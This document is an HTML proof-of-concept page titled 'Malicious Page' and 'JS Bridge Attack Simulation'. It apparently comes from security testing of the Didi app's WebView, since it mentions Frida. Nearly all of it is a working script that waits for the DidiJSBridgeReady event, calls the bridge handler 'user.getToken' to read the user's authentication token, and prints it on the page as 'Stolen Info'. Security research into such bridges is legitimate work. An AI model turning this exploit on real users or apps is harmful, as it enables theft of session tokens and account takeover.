<!DOCTYPE html>
<html>
<head>
    <title>Malicious Page</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
</head>
<body style="background-color:#1a1a1a; color:#00ff00; font-family: monospace; padding: 20px;">
    <h1>JS Bridge Attack Simulation (from Gitee)</h1>
    <div id="status" style="border: 1px solid lime; padding: 10px; margin-top: 20px;">Waiting for DidiJSBridgeReady event...</div>
    <script>
        // ... (和之前 CodePen 版本里一样的完整 JS 攻击代码) ...
        const statusDiv = document.getElementById('status');
        function log(message) {
            console.log(message);
            statusDiv.innerHTML += `<p>> ${message}</p>`;
        }
        log('Script loaded. Event listener for DidiJSBridgeReady has been set.');
        document.addEventListener('DidiJSBridgeReady', function() {
            log('<b>DidiJSBridgeReady event fired!</b> Bridge should be available.');
            if (window.DidiJSBridge && typeof window.DidiJSBridge.callHandler === 'function') {
                log('DidiJSBridge found. Attempting to call "user.getToken"...');
                try {
                    window.DidiJSBridge.callHandler('user.getToken', {}, function(tokenInfo) {
                        const result = JSON.stringify(tokenInfo);
                        log('<b>!!! SUCCESS: getToken Callback Executed !!!</b>');
                        log(`Stolen Info: <pre>${result}</pre>`);
                        alert('Token Stolen! See Frida console for details.');
                    });
                    log('callHandler("user.getToken") has been invoked without error.');
                } catch (e) {
                    log(`<b>ERROR calling JS Bridge:</b> ${e.message}`);
                }
            } else {
                log('<b>ERROR: DidiJSBridge object or callHandler method not found!</b>');
            }
        }, false);
    </script>
</body>
</html>